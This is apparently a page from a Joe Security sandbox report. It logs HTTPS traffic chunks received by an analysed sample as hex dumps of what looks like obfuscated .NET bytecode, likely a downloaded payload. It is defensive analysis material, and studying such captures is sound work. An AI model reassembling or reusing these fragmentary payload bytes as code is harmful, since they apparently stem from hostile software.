2022-02-22 14:30:32 UTC 38 IN Data Raw: 00 5a 58 fe 0e 1e 00 dd d0 e3 ff ff fe 0e 06 00 fe 0c 1f 00 20 01 00 00 00 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 04 e8 ff ff 00 fe 0c 08 00 fe 0c 00 00 59 fe 0e 1a 00 20 00 00 00 00 fe 0e 0f 00 20 02 00 00 00 fe 0e 0e 00 fe 0c 0f 00 fe 0c 0e 00 58 20 02 00 00 00 5b fe 0e 20 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 20 00 20 18 00 00 00 5a 58 fe 0c 16 00 58 4a fe 0e 18 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 20 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 25 00 fe 0c 1a 00 fe 0c 18 00 fe 0c 25 00 58 3c 16 00 00 00 fe Data Ascii: ZX ;O ;I' Y @0 TY X [ jX ZXXJ jX ZX XXJ%%X<
2022-02-22 14:30:32 UTC 40 IN Data Raw: 02 00 00 00 fe 09 02 00 a2 20 01 00 00 00 8d 03 00 00 01 fe 0e 27 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0b 00 20 01 00 00 00 8d 1a 00 00 01 fe 0e 11 00 7f 5a 00 00 04 fe 0e 00 00 fe 0c 00 00 fe 0e 1e 00 fe 0c 1e 00 fe 0e 08 00 00 fe 0c 15 00 20 01 00 00 00 3b 2a 1f 00 00 fe 0c 1e 00 fe 0e 08 00 fe 0c 1e 00 46 fe 0e 17 00 fe 0c 1e 00 20 01 00 00 00 58 fe 0e 1e 00 fe 0c 17 00 20 01 00 00 00 3f ef 03 00 00 fe 0c 17 00 20 1a 00 00 00 3d e1 03 00 00 20 0d 00 00 00 fe 0c 17 00 3f e0 01 00 00 20 0d 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 ba 0a 00 00 20 06 00 00 00 fe 0c 17 00 3f d6 00 00 00 20 06 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 6d 08 00 00 20 03 00 00 00 fe 0c 17 00 3f 64 00 00 00 20 03 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 96 07 00 00 20 01 00 00 00 fe Data Ascii: ' Z ;*F X ? = ? =8 ? =8m ?d =8
2022-02-22 14:30:32 UTC 41 IN Data Raw: 02 00 00 00 fe 0c 00 00 fe 0c 12 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 19 00 fe 0c 19 00 fe 0e 20 00 00 fe 0c 20 00 20 ff ff ff ff 3b 9f 02 00 00 fe 0c 00 00 fe 0c 20 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a 20 00 00 00 00 40 89 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 20 ff ff ff ff 3b 62 00 00 00 fe 0c 13 00 fe 0c 09 00 9a 25 14 40 25 00 00 00 26 fe 0c 13 00 fe 0c 09 00 fe 0c 1c 00 fe 0c 09 00 a3 13 00 00 01 28 18 00 00 0a a2 fe 0c 13 00 fe 0c 09 00 9a 00 fe 0c 0c 00 28 21 00 00 0a 3a 1e 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 20 00 38 49 ff ff ff 00 fe 0c 00 00 fe 0c 20 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0e 00 fe 0c 0e 00 20 01 00 00 00 Data Ascii: X (XXJ ; X XXJ @ X XXJ ;b%@%&((!: X (XXJ 8I X XXJ
2022-02-22 14:30:32 UTC 42 IN Data Raw: 00 dd 95 f5 ff ff fe 0c 05 00 fe 0c 1b 00 fe 0c 24 00 fe 0c 1e 00 fe 0c 16 00 58 4a 9a a2 fe 0c 10 00 fe 0c 1b 00 20 05 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 58 fe 0e 1b 00 fe 0c 1e 00 20 08 00 00 00 58 fe 0e 1e 00 dd 4e f5 ff ff fe 0c 05 00 fe 0c 1b 00 20 03 00 00 00 59 9a 74 1c 00 00 01 fe 0c 05 00 fe 0c 1b 00 20 02 00 00 00 59 9a 74 21 00 00 01 fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a 74 20 00 00 01 7e 18 00 00 04 fe 0c 1e 00 fe 0c 16 00 58 4a 97 29 2b 00 00 11 fe 0c 1b 00 20 03 00 00 00 59 fe 0e 1b 00 fe 0c 1e 00 20 08 00 00 00 58 fe 0e 1e 00 dd dc f4 ff ff fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 20 01 00 00 00 59 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a 74 0a 00 00 1b 7e 18 00 00 Data Ascii: $XJ X XN Yt Yt! Yt ~XJ)+ Y X Y Y Yt~
2022-02-22 14:30:32 UTC 44 IN Data Raw: 0f 00 38 6e ff ff ff fe 0c 20 00 20 01 00 00 00 59 fe 0e 0e 00 38 5b ff ff ff 00 fe 0e 1a 00 fe 0c 00 00 20 48 01 00 00 58 fe 0c 1a 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 21 00 fe 0c 21 00 fe 0c 12 00 3b bd 00 00 00 fe 0c 00 00 fe 0c 12 00 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 21 00 fe 0c 21 00 20 ff ff ff ff 3b 78 00 00 00 fe 0c 00 00 fe 0c 21 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 20 00 00 00 00 fe 0e 1b 00 fe 0c 00 00 fe 0c 00 00 fe 0c 21 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 14 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 21 00 9e fe 0c 27 00 fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 30 00 00 00 00 fe 0c 00 00 fe 0c 12 00 58 fe 0c 16 00 58 Data Ascii: 8n Y8[ HX ZX XXJ!!;X XXJ!! ;x!X XXJ !X XXJX!' X80XX
2022-02-22 14:30:32 UTC 45 IN Data Raw: 00 28 21 00 00 0a 3a 1e 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 38 49 ff ff ff 00 fe 0c 00 00 fe 0c 1a 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 20 01 00 00 00 3b b0 00 00 00 fe 0c 09 00 20 02 00 00 00 3b 45 01 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 Data Ascii: (!:X (XXJ8IX XXJ ; ;EX XXJ Y YX XXJX' X8.
2022-02-22 14:30:32 UTC 46 IN Data Raw: 00 fe 0c 19 00 58 fe 0c 16 00 58 4a fe 0e 19 00 38 42 fe ff ff 38 12 00 00 00 00 fe 0c 04 00 fe 0e 1e 00 20 ff ff ff ff fe 0e 04 00 00 00 dd 5d e5 ff ff fe 0c 1e 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 15 00 5a 58 fe 0e 1e 00 dd 2e e5 ff ff fe 0e 06 00 fe 0c 1f 00 20 01 00 00 00 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd f0 e8 ff ff 00 fe 0c 08 00 fe 0c 00 00 59 fe 0e 1a 00 20 00 00 00 00 fe 0e 0f 00 20 02 00 00 00 fe 0e 0e 00 fe 0c 0f 00 fe 0c 0e 00 58 20 02 00 00 00 5b fe 0e 20 00 fe Data Ascii: XXJ8B8 ]((%~a Y ZX. ;O ;I' Y @0 TY X [
Timestamp | kBytes transferred | Direction | Data
Copyright Joe Security LLC 2022 Page 41 of 65
2022-02-22 14:30:32 UTC 48 IN Data Raw: fe 0e 09 00 20 03 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 00 00 a2 fe 0c 08 00 20 01 00 00 00 fe 09 01 00 a2 7f 5b 00 00 04 fe 0e 03 00 fe 0c 03 00 fe 0e 07 00 fe 0c 07 00 fe 0e 05 00 00 fe 0c 00 00 20 01 00 00 00 3b d8 03 00 00 fe 0c 07 00 fe 0e 05 00 fe 0c 07 00 46 fe 0e 0a 00 fe 0c 07 00 20 01 00 00 00 58 fe 0e 07 00 fe 0c 0a 00 20 01 00 00 00 3f 69 01 00 00 fe 0c 0a 00 20 09 00 00 00 3d 5b 01 00 00 20 05 00 00 00 fe 0c 0a 00 3f b0 00 00 00 20 05 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 50 02 00 00 20 02 00 00 00 fe 0c 0a 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 20 01 00 00 20 01 00 00 00 fe 0c 0a 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 f9 00 00 00 38 f3 00 00 00 38 ee 00 00 00 20 Data Ascii: [ ;F X ?i =[ ? =8P ?> =8 ? =888
2022-02-22 14:30:32 UTC 49 IN Data Raw: 64 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 16 01 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 a8 00 00 00 38 a2 00 00 00 20 02 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 88 00 00 00 38 7c 00 00 00 38 77 00 00 00 20 05 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 05 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 32 01 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 ca 00 00 00 38 30 00 00 00 38 2b 00 00 00 20 06 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 06 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 58 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 c7 fe ff ff fe 0c 0d 00 fe 0c 0e 00 fe 0c 0b 00 fe 0c 08 00 fe 0c 01 00 58 4a 9a a2 fe Data Ascii: d =8 ? =88 ? =88|8w ?> =82 ? =8808+ ? =8X888XJ
2022-02-22 14:30:32 UTC 50 IN Data Raw: 03 00 00 20 0d 00 00 00 fe 0c 0c 00 3f 18 00 00 00 20 0d 00 00 00 fe 0c 0c 00 3d 05 00 00 00 38 89 03 00 00 38 30 00 00 00 38 2b 00 00 00 20 0f 00 00 00 fe 0c 0c 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 0c 00 3d 05 00 00 00 38 e4 03 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 71 fd ff ff fe 0c 09 00 fe 0c 04 00 fe 0c 07 00 fe 0c 05 00 fe 0c 10 00 58 4a 9a a2 fe 0c 08 00 fe 0c 04 00 20 05 00 00 00 9c fe 0c 04 00 20 01 00 00 00 58 fe 0e 04 00 fe 0c 05 00 20 08 00 00 00 58 fe 0e 05 00 38 2a fd ff ff fe 0c 09 00 fe 0c 04 00 14 a2 fe 0c 08 00 fe 0c 04 00 20 05 00 00 00 9c fe 0c 04 00 20 01 00 00 00 58 fe 0e 04 00 38 ff fc ff ff fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 09 00 fe 0c 04 00 20 02 00 00 00 59 9a fe 0c 09 00 fe 0c 04 00 20 01 Data Ascii: ? =8808+ ? =8888qXJ X X8* X8 Y Y
2022-02-22 14:30:32 UTC 52 IN Data Raw: 08 00 fe 0c 09 00 20 01 00 00 00 3f 8f 01 00 00 fe 0c 09 00 20 0a 00 00 00 3d 81 01 00 00 20 05 00 00 00 fe 0c 09 00 3f b0 00 00 00 20 05 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 54 02 00 00 20 02 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 46 01 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 1f 01 00 00 38 19 01 00 00 38 14 01 00 00 20 03 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 41 01 00 00 38 ee 00 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 62 01 00 00 38 c8 00 00 00 38 c3 00 00 00 20 08 00 00 00 fe 0c 09 00 3f 64 00 00 00 20 08 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 9d 02 00 00 20 06 Data Ascii: ? = ? =8T ?> =8F ? =888 ? =8A8 ? =8b88 ?d =8
2022-02-22 14:30:32 UTC 53 IN Data Raw: 00 00 20 01 00 00 00 58 fe 0e 00 00 fe 0c 0d 00 20 01 00 00 00 3f ef 03 00 00 fe 0c 0d 00 20 1a 00 00 00 3d e1 03 00 00 20 0d 00 00 00 fe 0c 0d 00 3f e0 01 00 00 20 0d 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 12 07 00 00 20 06 00 00 00 fe 0c 0d 00 3f d6 00 00 00 20 06 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 bc 04 00 00 20 03 00 00 00 fe 0c 0d 00 3f 64 00 00 00 20 03 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 cc 03 00 00 20 01 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 5e 03 00 00 38 58 03 00 00 20 02 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 3e 03 00 00 38 32 03 00 00 38 2d 03 00 00 20 04 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 85 03 00 00 38 07 Data Ascii: X ? = ? =8 ? =8 ?d =8 ? =8^8X ? =8>828- ? =88
2022-02-22 14:30:32 UTC 54 IN Data Raw: 00 00 00 59 8f 04 00 00 01 e0 4a fe 01 54 fe 0c 04 00 fe 0c 10 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 10 00 20 01 00 00 00 59 fe 0e 10 00 38 51 fa ff ff fe 0c 08 00 fe 0c 00 00 fe 0c 0a 00 58 4a 8f 12 00 00 01 fe 0c 03 00 fe 0c 10 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 52 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 fe 0c 10 00 20 01 00 00 00 59 fe 0e 10 00 38 07 fa ff ff fe 0c 04 00 fe 0c 10 00 20 00 00 00 00 9c fe 0c 03 00 fe 0c 10 00 8f 04 00 00 01 e0 fe 0c 08 00 fe 0c 00 00 fe 0c 0a 00 58 4a 8f 12 00 00 01 47 54 fe 0c 05 00 fe 0c 10 00 14 a2 fe 0c 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 ab f9 ff ff fe 0c 03 00 fe 0c 10 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 00 00 fe 0c 0a 00 Data Ascii: YJT Y Y8QXJ YJR X Y8 XJGT X X8 YJ
2022-02-22 14:30:32 UTC 58 IN Data Raw: 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 d2 f6 ff ff fe 0c 09 00 fe 0c 10 00 fe 0c 00 00 fe 0c 08 00 fe 0c 0e 00 58 4a 9a a2 fe 0c 07 00 fe 0c 10 00 20 05 00 00 00 9c fe 0c 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 8b f6 ff ff fe 0c 07 00 fe 0c 10 00 20 03 00 00 00 59 20 05 00 00 00 9c fe 0c 09 00 fe 0c 10 00 20 03 00 00 00 59 fe 0c 09 00 fe 0c 10 00 20 03 00 00 00 59 9a 74 0b 00 00 1b fe 0c 09 00 fe 0c 10 00 20 02 00 00 00 59 9a 74 0c 00 00 1b fe 0c 09 00 fe 0c 10 00 20 01 00 00 00 59 9a 74 0d 00 00 1b 7e 1e 00 00 04 fe 0c 08 00 fe 0c 0e 00 58 4a 97 29 36 00 00 11 a2 fe 0c 10 00 20 02 00 00 00 59 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 f6 f5 ff ff fe 0c 07 00 Data Ascii: X X8XJ X X8 Y Y Yt Yt Yt~XJ)6 Y X8
2022-02-22 14:30:32 UTC 62 IN Data Raw: 0f 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 7e f6 ff ff fe 0c 05 00 fe 0c 0c 00 fe 0c 03 00 58 4a 8f 12 00 00 01 fe 0c 09 00 fe 0c 0f 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 52 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 34 f6 ff ff fe 0c 0b 00 fe 0c 0f 00 20 00 00 00 00 9c fe 0c 09 00 fe 0c 0f 00 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 0c 00 fe 0c 03 00 58 4a 8f 12 00 00 01 47 54 fe 0c 01 00 fe 0c 0f 00 14 a2 fe 0c 0f 00 20 01 00 00 00 58 fe 0e 0f 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 d8 f5 ff ff fe 0c 09 00 fe 0c 0f 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 0c 00 fe 0c 03 00 58 4a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 59 5a Data Ascii: Y Y8~XJ YJR X Y84 XJGT X X8 YJ XJ XXJYZ
2022-02-22 14:30:32 UTC 64 IN Data Raw: 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a 74 21 00 00 01 7e 1f 00 00 04 fe 0c 0c 00 fe 0c 03 00 58 4a 97 29 42 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 56 f2 ff ff fe 0c 07 00 fe 0c 0c 00 fe 0c 03 00 58 4a fe 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 17 f2 ff ff fe 0c 0b 00 fe 0c 0f 00 20 05 00 00 00 9c fe 0c 01 00 fe 0c 0f 00 fe 0c 07 00 fe 0c 0c 00 fe 0c 03 00 58 4a 9a a2 fe 0c 0f 00 20 01 00 00 00 58 fe 0e 0f 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 d0 f1 ff ff fe 0c 09 00 fe 0c 0f 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 01 00 fe 0c 0f 00 20 02 00 00 00 59 9a 74 23 00 00 01 fe 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a fe 01 54 fe 0c 0b Data Ascii: Yt!~XJ)B X8VXJ Y X Y8 XJ X X8 Y Yt# YT
2022-02-22 14:30:32 UTC 68 IN Data Raw: 2a 2a fe 09 00 00 6f 36 00 00 0a 2a 2a fe 09 00 00 6f 37 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 38 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 28 39 00 00 0a 2a 2a fe 09 00 00 6f 3a 00 00 0a 2a 2a fe 09 00 00 6f 3b 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3c 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3d 00 00 0a 2a 00 13 30 03 00 dc 00 00 00 00 00 00 00 20 0c 00 00 00 8d 06 00 00 01 80 1f 00 00 04 7e 1f 00 00 04 20 00 00 00 00 fe 06 77 00 00 06 9b 7e 1f 00 00 04 20 01 00 00 00 fe 06 78 00 00 06 9b 7e 1f 00 00 04 20 02 00 00 00 fe 06 79 00 00 06 9b 7e 1f 00 00 04 20 03 00 00 00 fe 06 7a 00 00 06 9b 7e 1f 00 00 04 20 04 00 00 00 fe 06 7b 00 00 06 9b 7e 1f 00 00 04 20 05 00 00 00 fe 06 7c 00 00 06 9b 7e 1f 00 00 04 20 06 00 00 00 fe 06 7d 00 00 06 9b 7e 1f 00 Data Ascii: **o6**o7*:o8*:(9**o:**o;*:o<*:o=*0 ~ w~ x~ y~ z~ {~ |~ }~
2022-02-22 14:30:32 UTC 72 IN Data Raw: fe 0c 05 00 58 4a 9a a2 fe 0c 03 00 fe 0c 01 00 20 05 00 00 00 9c fe 0c 01 00 20 01 00 00 00 58 fe 0e 01 00 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 38 46 fc ff ff fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 9a 75 1c 00 00 01 a2 fe 0c 03 00 fe 0c 01 00 20 01 00 00 00 59 20 05 00 00 00 9c 38 0a fc ff ff fe 0c 11 00 fe 0c 07 00 fe 0c 05 00 58 4a fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 9a a2 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 fe 0c 01 00 20 01 00 00 00 59 fe 0e 01 00 38 cb fb ff ff fe 0c 03 00 fe 0c 01 00 20 05 00 00 00 9c fe 0c 08 00 fe 0c 01 00 fe 0c 11 00 fe 0c 07 00 fe 0c 05 00 58 4a 9a a2 fe 0c 01 00 20 01 00 00 00 58 fe 0e 01 00 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 38 84 fb ff ff fe 0c 08 00 fe 0c Data Ascii: XJ X X8F Y Yu Y 8XJ Y X Y8 XJ X X8
2022-02-22 14:30:32 UTC 76 IN Data Raw: 0c 04 00 3d 05 00 00 00 38 c2 00 00 00 38 2b 00 00 00 20 04 00 00 00 fe 0c 04 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 04 00 3d 05 00 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 fe 0c 0b 00 fe 0c 00 00 fe 0c 03 00 fe 0c 09 00 fe 0c 0a 00 58 4a 9a a2 fe 0c 08 00 fe 0c 00 00 20 05 00 00 00 9c fe 0c 00 00 20 01 00 00 00 58 fe 0e 00 00 fe 0c 09 00 20 08 00 00 00 58 fe 0e 09 00 38 d2 fe ff ff fe 0c 0b 00 fe 0c 00 00 20 01 00 00 00 59 9a 74 09 00 00 02 7e 2a 00 00 04 fe 0c 09 00 fe 0c 0a 00 58 4a 97 29 1e 00 00 11 fe 0c 00 00 20 01 00 00 00 59 fe 0e 00 00 fe 0c 09 00 20 08 00 00 00 58 fe 0e 09 00 38 88 fe ff ff 00 38 82 fe ff ff fe 0c 09 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0d 00 5a 58 fe 0e 09 00 Data Ascii: =88+ ? =888XJ X X8 Yt~*XJ) Y X88((%~a Y ZX
2022-02-22 14:30:32 UTC 80 IN Data Raw: 00 01 7e 2b 00 00 04 fe 0c 27 00 fe 0c 10 00 58 4a 97 29 55 00 00 11 a2 fe 0c 2a 00 20 01 00 00 00 59 fe 0e 2a 00 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 dd 53 f1 ff ff fe 0c 0e 00 fe 0c 27 00 fe 0c 10 00 58 4a fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 9a a2 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 fe 0c 2a 00 20 01 00 00 00 59 fe 0e 2a 00 dd 14 f1 ff ff fe 0c 2c 00 fe 0c 2a 00 20 05 00 00 00 9c fe 0c 0c 00 fe 0c 2a 00 7e 2b 00 00 04 fe 0c 27 00 fe 0c 10 00 58 4a 97 29 02 00 00 11 a2 fe 0c 2a 00 20 01 00 00 00 58 fe 0e 2a 00 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 dd c7 f0 ff ff fe 0c 2c 00 fe 0c 2a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 9a 74 05 00 00 01 7e 2b 00 00 Data Ascii: ~+'XJ)U* Y*' X'S'XJ* Y' X'* Y*,* *~+'XJ)* X*' X',* Y * Y* Yt~+
2022-02-22 14:30:32 UTC 84 IN Data Raw: fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 22 00 fe 0c 19 00 7a 00 38 51 03 00 00 00 fe 0c 0d 00 fe 0c 0d 00 fe 0c 15 00 fe 0c 14 00 94 58 fe 0c 10 00 58 4a 58 fe 0c 10 00 58 4a fe 0e 11 00 20 ff ff ff ff fe 0c 12 00 3b 1e 03 00 00 fe 0c 1d 00 fe 0c 12 00 3b ff 02 00 00 fe 0c 12 00 fe 0c 0d 00 59 fe 0e 2b 00 00 fe 0c 14 00 20 00 00 00 00 3b 17 01 00 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 2b 00 fe 0e 02 00 20 00 00 00 00 fe 0e 13 00 20 04 00 00 00 fe 0e 20 00 fe 0c 13 00 fe 0c 20 00 58 20 02 00 00 00 5b fe 0e 26 00 fe 0c 0d 00 20 e3 03 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 fe 0c 10 00 58 4a fe 0e 21 00 fe 0c 0d 00 20 e3 03 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 08 00 Data Ascii: X8 "z8QXXJXXJ ;;Y+ ; Y+ X [& X& ZXXJ! X& ZX
2022-02-22 14:30:32 UTC 88 IN Data Raw: ff 00 fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 9a 2a 00 00 00 13 30 07 00 0e 17 00 00 61 00 00 11 fe 0d 04 00 25 20 01 00 00 00 54 46 fe 0e 03 00 fe 0c 03 00 20 04 00 00 00 5a fe 0e 07 00 fe 0c 03 00 20 08 00 00 00 5a fe 0e 0e 00 20 04 00 00 00 8d 01 00 00 01 fe 0e 02 00 20 04 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 04 00 00 00 8d 03 00 00 01 fe 0e 06 00 20 01 00 00 00 8d 12 00 00 01 25 fe 0e 15 00 fe 0e 10 00 20 06 00 00 00 8d 03 00 00 01 25 fe 0e 01 00 fe 0e 09 00 20 02 00 00 00 8d 04 00 00 01 25 fe 0e 08 00 fe 0e 0c 00 20 04 00 00 00 8d 04 00 00 01 25 fe 0e 0f 00 fe 0e 13 00 20 03 00 00 00 8d 02 00 00 01 fe 0e 12 00 fe 0c 0c 00 20 00 00 00 00 8f 04 00 00 01 fe 09 00 00 55 fe 0c 12 00 20 00 00 00 00 fe 09 01 00 a2 7f 69 00 00 04 fe 0e 0a 00 fe 0c 0a 00 Data Ascii: Y*0a% TF Z Z % % % % U i
